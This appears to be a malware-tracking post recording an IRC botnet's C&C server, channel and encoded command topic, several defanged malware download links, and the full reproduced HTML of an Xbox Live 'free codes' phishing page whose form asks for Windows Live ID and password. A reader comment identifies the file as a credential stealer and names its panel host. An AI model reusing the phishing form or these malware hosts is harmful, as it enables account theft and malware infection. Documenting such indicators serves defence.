Resolved : [digested.maneradio.net] To [82.165.156.127]
Download URLs
hxxp://107.20.142.191/u/108730327/c.exe (dl.dropbox.com)
hxxp://74.208.112.117:6/.x/heroi.exe
C&C Server: 82.165.156.127:1866
Server Password:
Username: hh
Nickname: n[DEU|XP|DELL-D3E62F7E26]vddowpy
Channel: #!h! (Password: )
Channeltopic: :.load /99/106/112/81/55/59/40/110/116/35/105/120/111/108/117/108/110/38/127/122/100/56/126/9/18/40/39/45/57/39/42/56/55/44/98/14/100/123/108/
Topic By: [ tx ]
UPDATE:
Concerning a post from an anonymous guy:
I'm adding this here with modifications to prevent accidental infections.
Here is a Smoke bin, I believe with a rootkit in it: hxxps://dl.dropbox.com/u/104452013/chainzaio.exe, and here is a Java drive-by with either Athena, Insomnia or Andromeda: hxxp://freeunlimitedxboxcodes.tk. Have fun lol.
Here is more about the .tk drive-by:
index.html:
<html> <head> <title>sean</title> <meta name="description" content="sean"> <meta name="keywords" content="background,message,commons"> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-23441223-3']); _gaq.push(['_setDomainName', 'none']); _gaq.push(['_setAllowLinker', true]); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> </head> <frameset rows="*" framespacing="0" border="0" frameborder="NO"> <frame src="http://xboxcodesexploiter.yolasite.com/" name="dot_tk_frame_content" scrolling="auto" noresize> </frameset> <noframes> <body> </body> </noframes> </html>
Here are the redirects:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License Name : FronzenAge Description: A two-column, fixed-width template suitable for business sites and blogs. Version : 1.0 Released : 20071108 --> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <title>sean</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <style type="text/css"> /* Design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License */ * { margin: 0; padding: 0; } body { background: #FFFFFF url(templates/FrozenAge2/resources/common/images/img01.gif) repeat-x; font-family: "Trebuchet MS", Arial, Helvetica, sans-serif; font-size: 13px; color: #6E6E6E; } #sys_banner{ width:960px; margin-left:auto; margin-right:auto; } /* Logo */ #logo { width: 870px; height: 135px; margin: 0 auto; } #logo h1, #logo h2 { margin: 0; color:#242c36; } #logo h1 a{ color:#242c36; } #logo h1 { float: left; padding-top: 75px; } #logo h2 { float: right; padding-top: 95px; font-size: 16px; font-weight: normal; } #logo h2, #logo h2 a { color: #939292; } #logo a { text-decoration: none; } /* Menu */ #menu { width: 960px; height: 62px; margin: 0 auto; background: #252E3A url(templates/FrozenAge2/resources/common/images/img02.jpg) no-repeat; } #menu ul { margin: 0; padding: 21px 0 0 30px; list-style: none; line-height: normal; } #menu li { float: left; padding: 0 20px 0 22px; background: url(templates/FrozenAge2/resources/common/images/img03.gif) no-repeat left center; } #menu li.first { background: none; } #menu a { text-decoration: none; font-size: 14px; font-weight: bold; color: #FFFFFF; } /* Page */ #content { width: 900px; margin: 0 auto; padding: 45px 35px 45px 25px; 
background: url(templates/FrozenAge2/resources/common/images/img05.gif) no-repeat; } /* Content */ /* #content { float: left; width: 603px; } */ /* Footer */ .sys_footer { clear: both; width: 870px; height: 40px; margin: 0 auto; padding: 35px 45px 0px 45px; background: url(templates/FrozenAge2/resources/common/images/img05.gif) no-repeat; text-align:center; } #sys_designerfooter { border: none; margin:0 auto; padding: 0; background: none; position:relative; top:-60px; } .sys_footer p { margin: 0; line-height: normal; color: #B4B4B4; } .sys_footer a { color: #B4B4B4; } .sys_footer .legal { float: left; } .sys_footer .credit { float: right; } .sys_txt{ margin: 0; padding: 0; font-family: "Trebuchet MS", Arial, Helvetica, sans-serif; font-size: 13px; color: #6E6E6E; } a{color:#346086;} .sys_txt a img{ border : none; } .sys_txt a{ color: #346086; } .sys_txt a:hover{ text-decoration: none; } .sys_txt h1, .sys_txt h2, .sys_txt h3, .sys_txt h4, .sys_txt h5, .sys_txt h6, .sys_txt p{ font-weight: normal; } .sys_txt h1{ font-size : 2em; color : #242c36; letter-spacing : -2px; } .sys_txt h2{ font-size : 1.6em; color : #242c36; padding : 10px 0 10px 0; letter-spacing : -1px; } .sys_txt h3{ font-size : 1em; color : #242c36; padding : 10px 0 10px 0; } .sys_txt h4{ font-size : 1em; color : #242c36; padding : 10px 0 10px 0; } .sys_txt h5{ font-size : 1em; color : #242c36; padding : 10px 0 10px 0; } .sys_txt h6{ font-size : 1em; color : #242c36; padding : 10px 0 10px 0; } .sys_txt p, .sys_txt blockquote, .sys_txt ul, .sys_txt ol { margin-bottom: 1.5em; line-height: 1.8em; padding-left :1em; } .sys_txt p{ margin:0; padding:10px 0; } .sys_txt blockquote { font-style : italic; border-style : none; margin-left : 2em; margin:0; padding:10px 30px; } .sys_txt ul, .sys_txt ol{ font-family:Tahoma,Arial,Helvetica,sans-serif; font-size:small; font-size-adjust:none; font-style:normal; font-variant:normal; font-weight:normal; line-height:normal; margin-left: 5em; } .sys_txt ul{ margin:0; 
padding:10px 50px; list-style: square; } .sys_txt ol{ margin:0; padding:10px 50px; list-style: lower-roman; } .sys_txt ul li{ } </style> <link rel="stylesheet" type="text/css" href="classes/components/Form/layouts/Default/Default.css" /><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script><script type="text/javascript">window.jQuery || document.write('<script src="classes/commons/jquery/jquery-1.7.1.min.js"></script>')</script> </head> <body id="sys_background"> <div id="logo"> <h1 class="empty" style="text-align:left;"><a id="sys_heading" href="./" style="color:#242c36;font-size:26px;font-style:normal;font-weight:bold;text-decoration:none;"></a></h1> </div> <div id="menu"> <ul class='sys_navigation'> <li class="first"><a href="./" title="Home">Home</a></li> <li><a href="proof.php" title="Proof">Proof</a></li> <li><a href="about.php" title="About">About</a></li> </ul> </div> <div id="splash"> <div id="sys_banner" name="banner" style="height:147px;width:960px; background: url(resources/coollogo_com-12935788.png.cropped960x147o0%2C16s886x102.png) no-repeat;"> </div> </div> <!-- start page --> <div id="content"> <div style="width: 100%; padding: 0px; margin: 0px" class="layout_1-column"> <div id="layout_row1"> <div id="sys_region_1" style="margin:0px; padding:5px; vertical-align:top; line-height:normal; min-width:100px" class="zone_top" ><div id="I17" style="display:block;clear: both;text-align:center;margin:10px 10px 10px 10px;" class="Social_LikeStrip_Default"><div> <table cellpadding='0' cellspacing='0' style='width:100%;'> <tr> <td style='width:50%;'></td> <td> <table cellpadding='0' cellspacing='0'> <tr> <td style='vertical-align:bottom;'> <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script> <a href="http://twitter.com/share" class="twitter-share-button" data-lang="en" data-count="none">Tweet</a> </td> <td style='vertical-align:bottom;'> <div style='padding:0 5px;'> <iframe 
src="http://www.facebook.com/plugins/like.php?send=false&href=http%3A%2F%2Fxboxcodesexploiter.yolasite.com%2F&layout=button_count&show_faces=false&action=like&width=49&height=20&locale=en_US" scrolling="no" frameborder="0" style="border:none;overflow:hidden;width:49px;height:20px;" allowTransparency="true"></iframe> </div> </td> <td style='vertical-align:bottom;'> <script type="text/javascript" src="https://apis.google.com/js/plusone.js"> {lang: 'en-US'} </script> <g:plusone size="medium" count="false"></g:plusone> <script type="text/javascript">gapi.plusone.go();</script> </td> </tr> </table> </td> <td style='width:50%;'></td> </tr> </table> </div></div><div id="I21" style="display:block;clear: both;text-align:center;" class="GoogleAdSense_Default"></div><div id="I22" style="display:block;clear: both;margin:10px 10px 10px 10px;" class="Horizontal_Line_Default"> <div style='border-bottom-width:1px;border-bottom-style:solid;border-bottom-color:#cccccc;font-size:0;padding:0;margin:0;height:0;line-height:0;'></div> </div><div id="I16" style="display:block;clear: both;" class="Form_Default"><div class="sys_yola_form"> <form method='post' action='http://forms.yola.com/formservice/en/c3f8653cf6bc4b77b3fb6becfe738162/8a49866b3a06a8b4013a0a4a083253c9/8a49866b3a06a8b4013a0a4a084d53ca/I16/'> <div class='yola-form-field'> <p class='label'><label for='yola_form_widget_I16_0'>Windows live id</label></p> <input id='yola_form_widget_I16_0' class='text' name='0<text>' type='text' value='' /> <input type='hidden' name='0<label>' value='Windows live id' /> </div> <div class='yola-form-field'> <p class='label'><label for='yola_form_widget_I16_1'>Account password</label></p> <input id='yola_form_widget_I16_1' class='text' name='1<text>' type='text' value='' /> <input type='hidden' name='1<label>' value='Account password' /> </div> <div class='yola-form-field'> <p class='label'><label for='yola_form_widget_I16_2'>What you wan't</label></p> <select id='yola_form_widget_I16_2' 
name='2<list>'> <option value='48 hour trial'>48 hour trial</option><br /> <option value='1 month xbox gold'>1 month xbox gold</option><br /> <option value='3 months of xbox gold'>3 months of xbox gold</option><br /> <option value='12 months of xbox gold'>12 months of xbox gold</option><br /> <option value='160 Microsoft points'>160 Microsoft points</option><br /> <option value='1600 Microsoft points'>1600 Microsoft points</option><br /> <option value='4000 Microsoft points'>4000 Microsoft points</option><br /> </select> <input type='hidden' name='2<label>' value='What you wan't' /> </div> <input type='hidden' name='redirect' value='http://xboxcodesexploiter.yolasite.com/?formI16Posted=true' /> <input type='hidden' name='redirect_fail' value='http://xboxcodesexploiter.yolasite.com/?formI16PostFailed=true' /> <input type='hidden' name='form_name' value='' /> <input type='hidden' name='site_name' value='sean' /> <input type='hidden' name='destination' value='1Qh4a682H62S1P4Tycj48xLmobIkzlipU1o=:RtGwf7dhwaQhbXMBthrD38eWKotEi_igFka46FSurbo=' /> <p><input class='submit' type="submit" value="Exploit" /></p> </form> </div></div></div> </div> </div> </div> <!-- end page --> <div id='sys_footer' class='sys_footer'></div> <style type="text/css"> #sys_yolacredit_wrap{text-align:center;} #sys_yolacredit{text-align:center;line-height:1.2em;margin:1em auto;font-family:Arial;position:relative;background:#fff url(classes/commons/yola_footer/png/sprites.png) top right no-repeat;border-top:1px solid #e1e1e1;border-bottom:1px solid #e1e1e1;padding:13px 73px 15px 17px;color:#222;font-size:18px;display:inline-block;} #sys_yolacredit p{margin:0;padding:0;line-height:1.2em;} #sys_yolacredit p a{color:#222;text-decoration:none;} #sys_yolacredit p a:hover{text-decoration:underline;} #sys_yolacredit_message{display:none;color:red;padding:20px 20px 20px 110px;background:url(classes/commons/yola_footer/png/sprites.png) 20px center no-repeat;position:absolute;top:0;right:0;z-index:1;} 
#sys_yolacredit_message_wrap{display:none;position:absolute;top:0;right:0;padding-bottom:25px;background:url(classes/commons/yola_footer/png/sprites.png) bottom left no-repeat;} #sys_yolacredit_message_wrap_inner{font-size:13px;opacity:.8;filter: alpha(opacity = 80);background:#797979;-moz-border-radius:8px;-khtml-border-radius:8px;-webkit-border-radius:8px;border-radius:8px;} #sys_yolacredit_message p{width:260px;padding:5px 0;margin:0;text-align:left;color:#fff;font-size:13px;background:transparent;position:relative;} #sys_yolacredit a.yola{font-size:0;position:absolute;top:5px;right:0;display:inline-block;width:65px;height:37px;float:right;text-decoration:none;color:"#fff";} #sys_yolacredit a.yola:hover;{text-decoration:none;} #sys_yolacredit a.yola span{display:none;} </style> <!--[if lte IE 6]> <style type="text/css"> #sys_yolacredit{background:#fff url(classes/commons/yola_footer/gif/sprites.gif) top right no-repeat;} #sys_yolacredit_message{background:url(classes/commons/yola_footer/gif/sprites.gif) 20px center no-repeat;} #sys_yolacredit_message_wrap{background:url(classes/commons/yola_footer/gif/sprites.gif) bottom left no-repeat;} #sys_yolacredit_message_wrap_inner{filter: alpha(opacity = 100);} </style> <![endif]--> <div id="sys_yolacredit_wrap"> <span id="sys_yolacredit" style="" title="Visit Yola.com to create your own free website"> <div id="sys_yolacredit_message"> <p>This free website was made using Yola.</p> <p>No HTML skills required. 
Build your website in minutes.</p> <p>Go to www.yola.com and sign up today!</p> </div> <div id="sys_yolacredit_message_wrap"> <div id="sys_yolacredit_message_wrap_inner"></div> </div> <p>Make a <a href="http://www.yola.com/">free website</a> with <a class="yola" href="http://www.yola.com/"><span>Yola</span></a></p> </span> </div> <script type="text/javascript"> document.getElementById("sys_yolacredit").onmouseover = function(){ var m = document.getElementById("sys_yolacredit_message"), w = document.getElementById("sys_yolacredit_message_wrap"), n = document.getElementById("sys_yolacredit_message_wrap_inner"); m.style.display = "block"; w.style.display = "block"; m.style.top = (m.offsetHeight * -1 - 15) + "px"; w.style.top = m.style.top; m.style.right = (m.offsetWidth * -1 + 78) + "px"; w.style.right = m.style.right; n.style.width = m.offsetWidth + "px"; n.style.height = m.offsetHeight + "px"; }; document.getElementById("sys_yolacredit").onmouseout = function(){ document.getElementById("sys_yolacredit_message").style.display = "none"; document.getElementById("sys_yolacredit_message_wrap").style.display = "none"; }; </script> <script type="text/javascript"> var _yts = _yts || []; _yts.push(["_siteId", "8a49866b3a06a8b4013a0a4a083253c9"]); _yts.push(["_trackPageview"]); (function() { var yts = document.createElement("script"); yts.type = "text/javascript"; yts.async = true; yts.src = "http://analytics.yola.net/tracking.js"; (document.getElementsByTagName("head")[0] || document.getElementsByTagName("body")[0]).appendChild(yts); })(); </script><!-- Start Quantcast tag --> <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script> <script type="text/javascript">_qacct="p-b8x17GqsQ_656";quantserve();</script> <noscript> <a href="http://www.quantcast.com/p-b8x17GqsQ_656" target="_blank"><img src="http://pixel.quantserve.com/pixel/p-b8x17GqsQ_656.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></a> </noscript> <!-- End 
Quantcast tag --></body> </html>
Hosting info:
http://whois.domaintools.com/82.165.156.127
I_Post_Ur_Info - September 28, 2012 at 11:56 pm
Eh, the file is just a stealer, probably ISR, in a password-protected 7zip file inside of a self-extracting 7zip archive. Panel is here: smokeindrostealer.binhoster.com
JDB is just an Xbox Live account phish.